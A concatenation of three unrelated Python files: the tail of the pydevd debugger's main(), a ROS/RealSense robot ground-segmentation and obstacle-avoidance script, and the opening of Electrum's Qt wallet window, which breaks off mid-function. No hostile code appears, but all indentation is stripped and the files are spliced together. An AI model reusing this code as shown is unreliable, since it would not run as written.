if curr_stdin is debug_console_stdin:
sys.stdin = original_sys_stdin
return _original_getpass(*args, **kwargs)
finally:
sys.stdin = curr_stdin
getpass_mod.getpass = getpass
# Dispatch on_debugger_modules_loaded here, after all primary py_db modules are loaded
for handler in pydevd_extension_utils.extensions_of_type(DebuggerEventHandler):
handler.on_debugger_modules_loaded(debugger_version=__version__)
#=======================================================================================================================
# main
#=======================================================================================================================
def main():
# parse the command line. --file is our last argument that is required
pydev_log.debug("Initial arguments: %s", (sys.argv,))
pydev_log.debug("Current pid: %s", os.getpid())
try:
from _pydevd_bundle.pydevd_command_line_handling import process_command_line
setup = process_command_line(sys.argv)
SetupHolder.setup = setup
except ValueError:
pydev_log.exception()
usage(1)
if setup['print-in-debugger-startup']:
try:
pid = ' (pid: %s)' % os.getpid()
except:
pid = ''
sys.stderr.write("pydev debugger: starting%s\n" % pid)
pydev_log.debug("Executing file %s", setup['file'])
pydev_log.debug("arguments: %s", (sys.argv,))
pydevd_vm_type.setup_type(setup.get('vm_type', None))
if SHOW_DEBUG_INFO_ENV:
set_debug(setup)
DebugInfoHolder.DEBUG_RECORD_SOCKET_READS = setup.get('DEBUG_RECORD_SOCKET_READS', DebugInfoHolder.DEBUG_RECORD_SOCKET_READS)
DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS = setup.get('DEBUG_TRACE_BREAKPOINTS', DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS)
DebugInfoHolder.DEBUG_TRACE_LEVEL = setup.get('DEBUG_TRACE_LEVEL', DebugInfoHolder.DEBUG_TRACE_LEVEL)
port = setup['port']
host = setup['client']
f = setup['file']
fix_app_engine_debug = False
debugger = get_global_debugger()
if debugger is None:
debugger = PyDB()
try:
from _pydev_bundle import pydev_monkey
except:
pass # Not usable on jython 2.1
else:
if setup['multiprocess']: # PyDev
pydev_monkey.patch_new_process_functions()
elif setup['multiproc']: # PyCharm
pydev_log.debug("Started in multiproc mode\n")
global DISPATCH_APPROACH
DISPATCH_APPROACH = DISPATCH_APPROACH_EXISTING_CONNECTION
dispatcher = Dispatcher()
try:
dispatcher.connect(host, port)
if dispatcher.port is not None:
port = dispatcher.port
pydev_log.debug("Received port %d\n", port)
pydev_log.info("pydev debugger: process %d is connecting\n" % os.getpid())
try:
pydev_monkey.patch_new_process_functions()
except:
pydev_log.exception("Error patching process functions.")
else:
pydev_log.critical("pydev debugger: couldn't get port for new debug process.")
finally:
dispatcher.close()
else:
try:
pydev_monkey.patch_new_process_functions_with_warning()
except:
pydev_log.exception("Error patching process functions.")
# Only do this patching if we're not running with multiprocess turned on.
if f.find('dev_appserver.py') != -1:
if os.path.basename(f).startswith('dev_appserver.py'):
appserver_dir = os.path.dirname(f)
version_file = os.path.join(appserver_dir, 'VERSION')
if os.path.exists(version_file):
try:
stream = open(version_file, 'r')
try:
for line in stream.read().splitlines():
line = line.strip()
if line.startswith('release:'):
line = line[8:].strip()
version = line.replace('"', '')
version = version.split('.')
if int(version[0]) > 1:
fix_app_engine_debug = True
elif int(version[0]) == 1:
if int(version[1]) >= 7:
# Only fix from 1.7 onwards
fix_app_engine_debug = True
break
finally:
stream.close()
except:
pydev_log.exception()
try:
# In the default run (i.e.: run directly on debug mode), we try to patch stackless as soon as possible
# on a run where we have a remote debug, we may have to be more careful because patching stackless means
# that if the user already had a stackless.set_schedule_callback installed, he'd loose it and would need
# to call it again (because stackless provides no way of getting the last function which was registered
# in set_schedule_callback).
#
# So, ideally, if there's an application using stackless and the application wants to use the remote debugger
# and benefit from stackless debugging, the application itself must call:
#
# import pydevd_stackless
# pydevd_stackless.patch_stackless()
#
# itself to be able to benefit from seeing the tasklets created before the remote debugger is attached.
from _pydevd_bundle import pydevd_stackless
pydevd_stackless.patch_stackless()
except:
# It's ok not having stackless there...
try:
if hasattr(sys, 'exc_clear'):
sys.exc_clear() # the exception information should be cleaned in Python 2
except:
pass
is_module = setup['module']
if not setup['skip-notify-stdin']:
patch_stdin()
if setup[pydevd_constants.ARGUMENT_JSON_PROTOCOL]:
PyDevdAPI().set_protocol(debugger, 0, JSON_PROTOCOL)
elif setup[pydevd_constants.ARGUMENT_HTTP_JSON_PROTOCOL]:
PyDevdAPI().set_protocol(debugger, 0, HTTP_JSON_PROTOCOL)
elif setup[pydevd_constants.ARGUMENT_HTTP_PROTOCOL]:
PyDevdAPI().set_protocol(debugger, 0, pydevd_constants.HTTP_PROTOCOL)
elif setup[pydevd_constants.ARGUMENT_QUOTED_LINE_PROTOCOL]:
PyDevdAPI().set_protocol(debugger, 0, pydevd_constants.QUOTED_LINE_PROTOCOL)
access_token = setup['access-token']
if access_token:
debugger.authentication.access_token = access_token
client_access_token = setup['client-access-token']
if client_access_token:
debugger.authentication.client_access_token = client_access_token
if fix_app_engine_debug:
sys.stderr.write("pydev debugger: google app engine integration enabled\n")
curr_dir = os.path.dirname(__file__)
app_engine_startup_file = os.path.join(curr_dir, 'pydev_app_engine_debug_startup.py')
sys.argv.insert(1, '--python_startup_script=' + app_engine_startup_file)
import json
setup['pydevd'] = __file__
sys.argv.insert(2, '--python_startup_args=%s' % json.dumps(setup),)
sys.argv.insert(3, '--automatic_restart=no')
sys.argv.insert(4, '--max_module_instances=1')
# Run the dev_appserver
debugger.run(setup['file'], None, None, is_module, set_trace=False)
else:
if setup['save-threading']:
debugger.thread_analyser = ThreadingLogger()
if setup['save-asyncio']:
if IS_PY34_OR_GREATER:
debugger.asyncio_analyser = AsyncioLogger()
apply_debugger_options(setup)
try:
debugger.connect(host, port)
except:
sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
pydev_log.exception()
sys.exit(1)
globals = debugger.run(setup['file'], None, None, is_module)
if setup['cmd-line']:
debugger.wait_for_commands(globals)
if __name__ == '__main__':
main()
|
ground_seg.py
|
######################################
#######realsense plotting#############
######################################
'''
Working with
UBUNTU 16.04 LTS
OPENCV 4.0~
Python 3.6
pyrealsense2
matplotlib
numpy
for intel D435i
font
'''
import numpy as np
import cv2
import matplotlib.pyplot as plt
import math
import time
import sys
from sensor_msgs.msg import Image, CompressedImage
from geometry_msgs.msg import Twist
from nav_msgs.msg import Odometry
import rospy
import easyGo
from std_msgs.msg import String
from cv_bridge import CvBridge, CvBridgeError
import threading
from time import sleep
import csv
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--control', action='store_true')
parser.add_argument('--plot', action='store_true')
parser.add_argument('--csv', action='store_true')
args = parser.parse_args()
global depth_scale, ROW, COL
if args.csv:
CSV_NAME = "office_01"
f= open(CSV_NAME+'.csv','w')
wr = csv.writer(f)
wr.writerow(["time", \
"linear_x", "angular_z", \
"deadends"])
#size of images
COL= 480
ROW = 640
#ROBOT MOVE
SPEED = 15
ROTATE_SPEED = 25
ANGULAR_SPEED = 0.2
# Set goal position
GOAL_X = 0
GOAL_Y = 5
VERTICAL_CORRECTION = 0.35 # 0.15 #0.45 #parameter of correction for parabola to linear
WARP_PARAM = 0.45 #value should be 0.0 ~ 1.0. Bigger get more warped. 0.45
GRN_ROI = 200 #The index of col that want to consider as ground ROI 400 300
ZOOM_PARAM = 0.15 #Force calibrating the depth image to match the color image 0.15 0.205
UNAVAILABLE_THRES = 200 # #The index of col that is threshold of unavailable virtual lane. defalut 170
ROBOT_WIDTH_LIST = [2,3,4,5]
ROBOT_LEFT = 1
ROBOT_RIGHT = 6
font = cv2.FONT_HERSHEY_SCRIPT_SIMPLEX
fontScale = 1.5
yellow = (0, 255, 255)
depth_image_raw = 0
color_image_raw = 0
robot_state = 0
cmd_vel = 0
t = time.time()
def euler_from_quaternion(x,y,z,w):
t3 = 2.0*(w*z+x*y)
t4 = 1.0-2.0*(y*y+z*z)
yaw_z = math.atan2(t3,t4)
return yaw_z
#Topview image. src, dst are numpy array.
def Topview(src):
global WARP_PARAM, ROW, COL
# col=720, row=1280
col, row = src.shape[0], src.shape[1]
corners = np.float32([[row*WARP_PARAM/2, 0], [row*(1-WARP_PARAM/2), 0], [0, col], [row, col]])
warp_corners = np.float32([[0, 0], [ROW, 0], [0, COL], [ROW, COL]])
trans_matrix = cv2.getPerspectiveTransform(corners, warp_corners)
dst = cv2.warpPerspective(src, trans_matrix, (ROW, COL))
return dst
#vertically scan ground
def verticalGround(depth_image2, images, numCol, plot):
global depth_scale, GRN_ROI, ROW, COL
###################################################################################
#############Calibration. CHECK HERE WHEN YOU USE DIFFERENT CAMERA!!###############
###################################################################################
numLine=numCol
#Force correction. Depth and color pixels don't match.
numCol=(int)((numCol-150)*(-0.15)+numCol)
# get [i,640] column
_640col = [a[numCol] for a in depth_image2]
abs_x = []
abs_y = []
ground_center_idx = []
# depth_image2[360] = depth_image2[360] * float(depth_scale)
for idx, temp in enumerate(_640col):
if _640col[idx] == 0:
abs_x.append(None)
abs_y.append(None)
else:
#true_idx is a calibrated idx. Because the start point is not zero. Start point of ROI is GRN_ROI.
true_idx = GRN_ROI + idx*(COL-GRN_ROI)/float(COL)
#Correction for parabola to linear. In other words, correcting lens distortion using 2nd-order function.
_640col[idx] = temp * depth_scale * (abs(true_idx -COL/2)**2/float(360**2)*VERTICAL_CORRECTION + 1)
#58.0 is vertical FOV of the depth IR sensor. abs_x and abs_y are absolute coordinate of one column of depth image.
abs_x.append(
_640col[idx] * math.cos(
((float)(58.0 / 2.0 - 58.0 * (float)(true_idx) / COL)) * 3.14 / 180.0))
abs_y.append(
_640col[idx] * math.sin((float)(58.0 / 2.0 - 58.0 * (float)(true_idx) / COL) * 3.14 / 180.0))
idx = 20 #temporary set the point, that we want to consider it would be almost ground.
try:
while abs_x[COL - idx] == None:
idx += 1
ground_center_idx.append(COL - idx) #ground_center_idx contains all the indexes of ground.
except:
print("TOO CLOSE!!!!!!!!!!!!!")
ground_center_idx.append(COL - 30)
i = 0
groundCount = 0 #Count points that considered as ground
hurdleCount = 0 #Count points that not considered as ground subsequently. Initialize it to zero when found ground.
while idx < COL:
#try:
if abs_x[COL - idx] == None or abs_y[COL - idx] == None:
idx += 1
#print(idx)
continue
# (abs(abs_x[ground_center_idx[i]] - abs_x[(720 - idx)]) < 0.4) and (
#To found ground indexes, we use differential. If variation dy/dx is lower than threshold, append it.
####################################################################################################
#######19/04/26 : I have updated the way of checking gradient. Now I use two gradients##############
#######from original, and from the current ground pixel. It works better ###########################
####################################################################################################
gradient_from_original = (abs_y[(COL - idx)] - abs_y[ground_center_idx[0]]) / float(abs_x[(COL - idx)] - abs_x[ground_center_idx[0]])
gradient_from_current = (abs_y[(COL - idx)] - abs_y[ground_center_idx[i]]) / float(abs_x[(COL - idx)] - abs_x[ground_center_idx[i]])
#print("dist" + str(_640col[COL - idx]))
if abs(gradient_from_original + 0.13) < 0.2 and abs(gradient_from_current + 0.133) < 0.15: #These number are carefully selected
#print("origin: ", gradient_from_original, "current: ", gradient_from_current)
ground_center_idx.append((COL - idx))
i += 1
cv2.circle(images, (numLine, (COL - idx)), 7, (0, 255, 0), 2)
groundCount += 1
hurdleCount = 0
# print(idx)
idx += 20
elif hurdleCount > 1:
break
else:
hurdleCount += 1
idx += 20
if plot:
#print(abs_x[ground_center_idx[0]], abs_y[ground_center_idx[0]])
#print(abs_x[ground_center_idx[-1]], abs_y[ground_center_idx[-1]])
#print((abs_x[ground_center_idx[-1]]-abs_x[ground_center_idx[0]])/(abs_y[ground_center_idx[-1]]-abs_y[ground_center_idx[0]]))
try:
# print(ground_center_idx[0])
plt.plot(abs_x, abs_y)
plt.scatter(abs_x[ground_center_idx[0]], abs_y[ground_center_idx[0]], color='r',
s=20) # red point on start point of ground
plt.scatter(abs_x[ground_center_idx[-1]], abs_y[ground_center_idx[-1]], color='r', s=20)
plt.xlim(0, 4) #5
plt.ylim(-2, 2)
plt.pause(0.05)
plt.cla()
plt.clf()
except:
pass
if ground_center_idx[-1] > UNAVAILABLE_THRES:
#dead_end = COL
dead_end = ground_center_idx[-1]
cv2.line(images, (numLine, 0), (numLine, ROW), (0, 0, 255), 5) #Draw a red line when ground indexes is less than we want.
else:
dead_end = ground_center_idx[-1]
cv2.line(images, (numLine, ground_center_idx[-1]), (numLine, COL), (0, 255, 0), 5) #Draw a green line.
try:
#pass
# Apply colormap on depth image (image must be converted to 8-bit per pixel first)5
cv2.circle(images, (numLine, ground_center_idx[0]), 5, (255, 255, 255), 10)
cv2.putText(images, str(round(abs_x[ground_center_idx[0]],2)) + "m", (numLine, COL - 100), font, fontScale, yellow, 2)
except:
pass
return images, dead_end
def preGroundSeg(depth_image, color_image):
global ROW, COL, GRN_ROI
# FIXME: don't do ZOOM_PARAM in GAZEBO
# Force calibrating the depth image to match the color image. Interpolation is really important. DO NOT USE INTER_LINEAR. IT MAKES NOISES!!!!
#depth_image = cv2.resize(depth_image[(int)(COL * ZOOM_PARAM):(int)(COL * (1 - ZOOM_PARAM)), (int)(ROW * ZOOM_PARAM):(int)(ROW * (1 - ZOOM_PARAM))],
# dsize=(ROW, COL), interpolation=cv2.INTER_NEAREST)
# ROI image
depth_image = depth_image[GRN_ROI:COL, 0:ROW]
color_image = color_image[GRN_ROI:COL, 0:ROW]
# Topview image
depth_image2 = Topview(depth_image)
color_image2 = Topview(color_image)
return depth_image2, color_image2
def GroundSeg(depth_image, color_image, stride=80):
global ROW
virtual_lane_available = []
for i in range(stride, ROW, stride):
if args.plot and i == ROW/2:
temp_image, dead_end = verticalGround(depth_image, color_image, i, plot=True)
else:
temp_image, dead_end = verticalGround(depth_image, color_image, i, plot=False)
virtual_lane_available.append(dead_end)
return temp_image, virtual_lane_available
def bool_straight(virtual_lane_available, unavailable_thres):
global ROBOT_WIDTH_LIST
for i in ROBOT_WIDTH_LIST:
# > means unavailable path
if virtual_lane_available[i] > unavailable_thres:
return False
return True
def LaneHandling(virtual_lane_available, unavailable_thres, n):
center = int(len(virtual_lane_available)/2)
#If center lane is blocked.
if virtual_lane_available[center] > unavailable_thres:
#two lanes are both unavailable
if n > center:
print("GO BACK")
return 4
if virtual_lane_available[center-n] > unavailable_thres and virtual_lane_available[center+n] > unavailable_thres:
n+=1
if n > center:
print("GO BACK")
return 4
else:
return LaneHandling(virtual_lane_available, unavailable_thres, n)
elif virtual_lane_available[center-n] > unavailable_thres:
print("TURN RIGHT")
return 3
elif virtual_lane_available[center+n] > unavailable_thres:
print("TURN LEFT")
return 2
else:
n += 1
return LaneHandling(virtual_lane_available, unavailable_thres, n)
#Checking where is future obstable and avoid it.
else:
if n > center:
print("NO OBS")
return 0 # no obstacle
if virtual_lane_available[center-n] > unavailable_thres and virtual_lane_available[center+n] > unavailable_thres and n > 2:
print("GO STRAIGHT")
return 1 # robot can pass through
if virtual_lane_available[center-n] > unavailable_thres:
print("TURN RIGHT")
return 3
elif virtual_lane_available[center+n] > unavailable_thres:
print("TURN LEFT")
return 2
else:
n+=1
return LaneHandling(virtual_lane_available, unavailable_thres, n)
def GoEasy(direc):
if direc == 4: # Backward
easyGo.mvStraight(- SPEED, -1)
elif direc == 1: # Go straight
easyGo.mvStraight(SPEED, -1)
elif direc == 2: # turn left
easyGo.mvRotate(ROTATE_SPEED, -1, False)
elif direc == 3: # turn right
easyGo.mvRotate(ROTATE_SPEED, -1, True)
def depth_callback(data):
global depth_image_raw
depth_image_raw = bridge.imgmsg_to_cv2(data, "32FC1")
def image_callback(data):
global color_image_raw
color_image_raw = bridge.compressed_imgmsg_to_cv2(data, "bgr8")
def state_callback(data):
global robot_state
q = data.pose.pose.orientation
yaw = euler_from_quaternion(q.x, q.y, q.z, q.w)
robot_state = [-data.pose.pose.position.y, data.pose.pose.position.x, -yaw]
def cmd_callback(data):
global cmd_vel
cmd_vel = data
def listener():
#rospy.init_node('node_name')
bridge = CvBridge()
rospy.Subscriber("/camera/depth/image_raw", Image, depth_callback)
rospy.Subscriber("/camera/color/image_raw/compressed", CompressedImage, image_callback)
rospy.Subscriber("/odom", Odometry, state_callback)
if args.csv:
rospy.Subscriber("/cmd_vel", Twist, cmd_callback)
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
def main():
# Configure depth and color streams
global depth_scale, ROW, COL, GRN_ROI, bridge
fpsFlag = False
numFrame = 1
fps = 0.0
bridge = CvBridge()
realsense_listener = threading.Thread(target=listener)
realsense_listener.start()
depth_scale = 1.0
startTime = time.time()
ground_seg_time = 0.0
lpp_time = 0.0
dist = 10.0
while(dist > 0.8):
t1 = time.time()
global depth_image_raw, color_image_raw, robot_state
if type(depth_image_raw) == type(0) or type(color_image_raw) == type(0):
sleep(0.1)
continue
dist = math.sqrt((GOAL_X - robot_state[1])**2 + (-GOAL_Y - robot_state[0])**2)
depth_image, color_image = preGroundSeg(depth_image_raw, color_image_raw)
# last step
color_image, virtual_lane_available = GroundSeg(depth_image, color_image)
t2 = time.time()
# handling lane
cv2.line(color_image, (0, UNAVAILABLE_THRES), (ROW, UNAVAILABLE_THRES), (0, 255, 0), 2)
if args.csv:
virtual_lane_available = np.array(virtual_lane_available)
# virtual_lane_available = UNAVAILABLE_THRES - virtual_lane_available # normalize. 0 means top of the image
virtual_lane_available = COL - virtual_lane_available
temp = [(time.time()-t), cmd_vel.linear.x, cmd_vel.angular.z]
temp.extend([x for x in virtual_lane_available])
wr.writerow(temp)
t3 = time.time()
direc = LaneHandling(virtual_lane_available, UNAVAILABLE_THRES, 1)
if args.control:
if direc == 0:
diff_angle = (-robot_state[2] + math.atan2(GOAL_X - robot_state[1], -GOAL_Y - robot_state[0]))
if diff_angle > 0:
v_ang = ANGULAR_SPEED * min(diff_angle/(math.pi/2), 1)
else:
v_ang = ANGULAR_SPEED * max(diff_angle/(math.pi/2), -1)
easyGo.mvCurve(SPEED, -v_ang)
else:
GoEasy(direc) # FIXME
t4 = time.time()
ground_seg_time += t2-t1
lpp_time += t4-t3
print("ground_seg took: {} sec".format(t2-t1))
print("MORP took: {} sec".format(t4-t3))
print("Average took: {} sec, {} sec, numFrame {}".format(ground_seg_time/numFrame, lpp_time/numFrame, numFrame))
print("Distance to the Goal: {}".format(dist))
cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)
cv2.imshow('RealSense', color_image)
#cv2.imshow('RealSense_depth', depth_image)
if cv2.waitKey(1) == 27: #esc
easyGo.stop()
cv2.destroyAllWindows()
rospy.signal_shutdown("esc")
if args.csv:
f.close()
sys.exit(1)
break
# FPS
numFrame += 1
easyGo.stop()
rospy.signal_shutdown("esc")
if __name__ == "__main__":
rospy.init_node('robot_mvs', anonymous=False)
main()
if args.csv:
f.close()
exit()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time, get_backup_dir,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
